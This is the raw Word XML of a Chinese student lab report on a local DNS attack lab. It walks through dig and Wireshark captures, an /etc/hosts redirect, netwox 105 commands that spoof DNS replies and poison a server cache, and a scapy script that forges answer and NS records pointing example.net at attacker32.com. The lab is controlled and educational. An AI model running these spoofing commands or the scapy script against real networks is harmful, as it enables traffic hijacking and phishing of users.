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1B1CC9" w14:textId="36068658" w:rsidR="00F56CF0" w:rsidRPr="00F56CF0" w:rsidRDefault="00F56CF0" w:rsidP="00E95193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I.</w:t>
      </w:r>
      <w:r w:rsidR="00E95193" w:rsidRPr="00E95193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Local DNS Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2086DD43" w14:textId="70281C0B" w:rsidR="00E95193" w:rsidRPr="00E95193" w:rsidRDefault="00E95193" w:rsidP="00F56CF0">
      <w:r w:rsidRPr="00E95193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现有三台虚拟机，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器：1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:t>92.168.19.14</w:t>
      </w:r>
      <w:r w:rsidR="00546A65">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用户机：1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:t>92.168.19.1</w:t>
      </w:r>
      <w:r w:rsidR="00546A65">
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击者：1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:t>92.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00546A65">
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00E95193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B98D76" w14:textId="77777777" w:rsidR="00E95193" w:rsidRDefault="00E95193" w:rsidP="00F56CF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F27695" w14:textId="3C6AA144" w:rsidR="00C0589D" w:rsidRPr="00F56CF0" w:rsidRDefault="0072386A" w:rsidP="00F56CF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28350695" w14:textId="58B12A72" w:rsidR="00E95193" w:rsidRDefault="00E95193" w:rsidP="00C37630">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对用户机设置指定D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器后，使用dig命令请求</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A07D56">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="00A07D56">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>.baidu.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的ip，并使用wireshark进行抓包，如下图可见用户向D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器发送了D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，服务器返回了查询结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB640C4" w14:textId="7C6556CE" w:rsidR="00E95193" w:rsidRPr="00E95193" w:rsidRDefault="00546A65" w:rsidP="00C37630">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C00DAD" wp14:editId="460A249C">
            <wp:extent cx="3930020" cy="27660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9451" cy="277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1D0F" w14:textId="586E61D5" w:rsidR="00E95193" w:rsidRDefault="00546A65" w:rsidP="00C37630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1DAC1D1F" wp14:editId="349E373E">
            <wp:extent cx="5274310" cy="7499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02D1" w14:textId="77777777" w:rsidR="00E95193" w:rsidRDefault="00E95193" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC672CE" w14:textId="5305A223" w:rsidR="00C37630" w:rsidRDefault="00C37630" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidR="00DE2354">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2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24119AB0" w14:textId="3FD7B6F5" w:rsidR="00546A65" w:rsidRDefault="00546A65" w:rsidP="00F34B64">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ireshark抓包如下，</w:t>
      </w:r>
      <w:r w:rsidR="00DF5236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户通过指定D</w:t>
      </w:r>
      <w:r w:rsidR="00DF5236">
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidR="00DF5236">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器ping搜狐服务器，经过多次问询后获得搜狐服务器地址，并ping成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8B783" w14:textId="70DD9B22" w:rsidR="00546A65" w:rsidRDefault="00546A65" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B01A343" wp14:editId="58196962">
            <wp:extent cx="5274310" cy="15792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5EB7" w14:textId="336606FA" w:rsidR="00DF5236" w:rsidRDefault="00DF5236" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2675F7" wp14:editId="45DE1FC9">
            <wp:extent cx="5274310" cy="13068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D28E" w14:textId="18D45019" w:rsidR="00546A65" w:rsidRDefault="00546A65" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的缓存如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2583FF" w14:textId="7E478B8E" w:rsidR="007B6E59" w:rsidRDefault="00546A65" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="540F01B1" wp14:editId="5B9856D2">
            <wp:extent cx="5274310" cy="49695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8AD7" w14:textId="77777777" w:rsidR="003E46E3" w:rsidRDefault="003E46E3" w:rsidP="00F34B64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7922BF97" w14:textId="4864CB14" w:rsidR="000B534D" w:rsidRPr="000B534D" w:rsidRDefault="000B534D" w:rsidP="00F34B64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00DF5236">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3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202F40C1" w14:textId="58288EC9" w:rsidR="00CE72C7" w:rsidRPr="00CE72C7" w:rsidRDefault="00CE72C7" w:rsidP="000A6238">
      <w:r w:rsidRPr="00CE72C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户机使用dig向服务器请求www</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE72C7">
        <w:t>.example.com的地址，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE72C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE72C7">
        <w:t>92.168.0.101</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE72C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的I</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE72C7">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE72C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2EF24F" w14:textId="26FA8711" w:rsidR="00771D4E" w:rsidRDefault="00CE72C7" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b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03A9941" wp14:editId="611B225F">
            <wp:extent cx="5274310" cy="41687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6D0A" w14:textId="01901EFC" w:rsidR="00CE72C7" w:rsidRDefault="00CE72C7" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B413822" w14:textId="6AFBBA8C" w:rsidR="00CE72C7" w:rsidRPr="000B534D" w:rsidRDefault="00CE72C7" w:rsidP="00CE72C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D"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4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163112CC" w14:textId="5E70C9CB" w:rsidR="0018016A" w:rsidRPr="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238">
      <w:r w:rsidRPr="00132486">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00132486">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00132486">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，ip为3</w:t>
      </w:r>
      <w:r>
        <w:t>4.102.136.180</w:t>
      </w:r>
      <w:r w:rsidRPr="00132486">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110150E3" w14:textId="27FA5693" w:rsidR="00CE72C7" w:rsidRDefault="0018016A" w:rsidP="000A6238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2E51F83E" wp14:editId="051BCCF6">
            <wp:extent cx="5274310" cy="16605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9A37" w14:textId="6D2C98B9" w:rsidR="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对/etc/hosts添加一行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EBEF29" w14:textId="0A42FE76" w:rsidR="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132486">
        <w:t>1.2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00132486">
        <w:tab/>
        <w:t>www.bank32.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C73ADFF" w14:textId="77777777" w:rsidR="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238"/>
    <w:p w14:paraId="49D81979" w14:textId="331FF7D6" w:rsidR="00132486" w:rsidRPr="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238">
      <w:r w:rsidRPr="00132486">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改后，为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00132486">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA00F9" w14:textId="4728B7A1" w:rsidR="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238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60593ABD" wp14:editId="24AB73CE">
            <wp:extent cx="5274310" cy="5949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6F43" w14:textId="10FEA7AB" w:rsidR="00132486" w:rsidRDefault="00132486" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FCA6C8" w14:textId="4E6D06CC" w:rsidR="00132486" w:rsidRPr="000B534D" w:rsidRDefault="00132486" w:rsidP="00132486">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5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585FA776" w14:textId="115DFE0C" w:rsidR="00DD4036" w:rsidRDefault="00DD4036" w:rsidP="000A6238">
      <w:r w:rsidRPr="00DD4036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在attacker上执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7D4BF" w14:textId="65F7A121" w:rsidR="00DD4036" w:rsidRPr="00DD4036" w:rsidRDefault="00DD4036" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4036">
        <w:t>sudo netwox 105 --hostname "www.example.com" --hostnameip 192.168.19.143 --authns "ns.example.com" --authnsip 192.168.19.143 --filter "src host 192.168.19.148"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB828DC" w14:textId="3C748BAB" w:rsidR="00DD4036" w:rsidRPr="00DD4036" w:rsidRDefault="00DD4036" w:rsidP="000A6238">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1EF1B1" wp14:editId="44126949">
            <wp:extent cx="5274310" cy="22142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9667" w14:textId="5ADCC694" w:rsidR="00DD4036" w:rsidRPr="00DD4036" w:rsidRDefault="00DD4036" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户机上使用dig，发现D</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD4036">
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD4036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的地址已变为attacker的地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1473141B" w14:textId="67ED56D6" w:rsidR="00132486" w:rsidRDefault="00DD4036" w:rsidP="000A6238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2FD94C0E" wp14:editId="716FAF6B">
            <wp:extent cx="5274310" cy="37871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4682" w14:textId="258298E2" w:rsidR="00DD4036" w:rsidRDefault="00DD4036" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B77C1D5" w14:textId="49484DF2" w:rsidR="00DD4036" w:rsidRPr="000B534D" w:rsidRDefault="00DD4036" w:rsidP="00DD4036">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
      <w:r w:rsidRPr="000B534D"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6</w:t>
      </w:r>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="4B8371EC" w14:textId="18EAEBCC" w:rsidR="005F272C" w:rsidRDefault="002242A4" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>在attacker上运行netwox：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0764A5F0" w14:textId="1FF716BC" w:rsidR="002242A4" w:rsidRDefault="002242A4" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002242A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>sudo netwox 105 --hostname "www.renxin.tian" --hostnameip 192.168.19.143 --authns "ns.renxin.tian" --authnsip 192.168.19.143 --ttl 600 --filter "src host 192.168.19.150" --</w:t>
      </w:r>
      <w:r w:rsidRPr="002242A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>spoofip "raw"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF8326" w14:textId="36F02490" w:rsidR="002242A4" w:rsidRDefault="002242A4" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4043467E" wp14:editId="1C48FBCA">
            <wp:extent cx="5274310" cy="11785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7A49" w14:textId="37E1A1C6" w:rsidR="002242A4" w:rsidRDefault="002242A4" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>在用户机上请求访问一个url（此处使用一个不存在的网址），成功获得attacker给出的返回信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2FDDA9" w14:textId="11F051EB" w:rsidR="00DD4036" w:rsidRDefault="005F272C" w:rsidP="000A6238">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="717920CC" wp14:editId="00F72D00">
            <wp:extent cx="5274310" cy="33178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7ADC" w14:textId="04423591" w:rsidR="005F272C" w:rsidRDefault="002242A4" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server的cache，发现已被污染：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CACE3" w14:textId="7B0DAB8D" w:rsidR="005F272C" w:rsidRDefault="005F272C" w:rsidP="000A6238">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FDBCA2B" wp14:editId="36E149BE">
            <wp:extent cx="5274310" cy="27571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430C" w14:textId="56BD709B" w:rsidR="002242A4" w:rsidRDefault="002242A4" w:rsidP="000A6238"/>
    <w:p w14:paraId="5B1985D7" w14:textId="47D1873C" w:rsidR="002242A4" w:rsidRPr="000B534D" w:rsidRDefault="002242A4" w:rsidP="002242A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D"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7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607EEF6F" w14:textId="0A10B8F9" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ttacker的scapy代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F726F0B" w14:textId="40719571" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041AC979" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFDD95" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD46090" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">    if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11896070" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E45605C" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E81B0" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='2.3.3.2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441215BA" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        NSsec1 = DNSRR(rrname='example.net', type='NS', ttl=259200, rdata='attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D863C8" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        Addsec1 = DNSRR(rrname='attacker32.com', type='A', ttl=259200, rdata='2.3.3.3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C788FA6" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382BC2A6" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">                 qdcount=1, ancount=1, nscount=1, arcount=1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D73127" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">                an=Anssec, ns=NSsec1 ,ar=Addsec1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785464A" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6434E" w14:textId="77777777" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t xml:space="preserve">        send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24387B5C" w14:textId="3E94DE8E" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:r>
        <w:t>pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702ACCF8" w14:textId="350628B3" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E"/>
    <w:p w14:paraId="4854365D" w14:textId="37F34EB5" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="00B2199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先在attacker上运行代码，然后在用户机上对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2199E">
        <w:t>www.example.net进行dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可观察到dig结果已被篡改：</w:t>
      </w:r>
    </w:p>
